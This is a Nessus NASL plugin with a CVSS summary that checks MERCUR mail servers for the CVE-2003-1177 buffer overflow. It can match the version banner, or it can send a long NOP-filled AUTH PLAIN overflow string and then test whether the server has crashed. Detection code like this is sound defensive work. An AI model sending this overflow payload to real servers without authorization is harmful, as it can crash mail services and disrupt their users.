7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.225 Low
EPSS
Percentile
96.5%
The remote Atrium MERCUR SMTP server (mail server) seems to be vulnerable to a remote buffer overflow. Successful exploitation of this vulnerability would give a remote attacker administrative access to the mail server and access to potentially confidential data.
The IMAP and POP3 servers are affected by similar issues involving the AUTHENTICATE and AUTH commands respectively.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(11910);
script_version("1.25");
script_cvs_date("Date: 2018/11/15 20:50:27");
script_cve_id("CVE-2003-1177");
script_bugtraq_id(8861, 8889);
script_name(english:"MERCUR Mailserver SMTP / IMAP / POP3 Servers Remote Overflows");
script_summary(english:"Checks for the Mercur remote buffer overflow");
script_set_attribute(attribute:"synopsis", value:"The remote mail server is prone to a buffer overflow attack.");
script_set_attribute(attribute:"description", value:
"The remote Atrium MERCUR SMTP server (mail server) seems to be
vulnerable to a remote buffer overflow. Successful exploitation of
this vulnerability would give a remote attacker administrative access
to the mail server and access to potentially confidential data.
The IMAP and POP3 servers are affected by similar issues involving the
AUTHENTICATE and AUTH commands respectively.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2003/Oct/1427" );
script_set_attribute(attribute:"solution", value:"Upgrade to MERCUR Mailserver 4.2 SP3a or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2003/10/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2003/10/27");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
script_family(english:"Windows");
script_dependencie("smtpserver_detect.nasl");
script_require_keys("Settings/ParanoidReport");
script_require_ports("Services/smtp", 25);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("smtp_func.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
port = get_kb_item("Services/smtp");
if(!port)port = 25;
if (!get_port_state(port)) exit(0);
if ( safe_checks() )
{
banner = get_smtp_banner(port:port);
if ( ! banner ) exit(0);
if(egrep(pattern:"^220.*MERCUR SMTP-Server .v([0-3]\.|4\.0?([01]\.|2\.0))",
string:banner))security_hole(port);
exit(0);
}
# this test string provided by
# Kostya KORTCHINSKY on FD mailing list at netsys
req = string("AUTH PLAIN kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ");
banner = get_smtp_banner(port:port);
if ("MERCURE SMTP-Server" >!< banner)
exit (0);
soc=open_sock_tcp(port);
if (!soc) exit(0);
send (socket:soc, data:req);
close(soc);
soc = open_sock_tcp(port);
if (!soc) security_hole(port);
exit(0);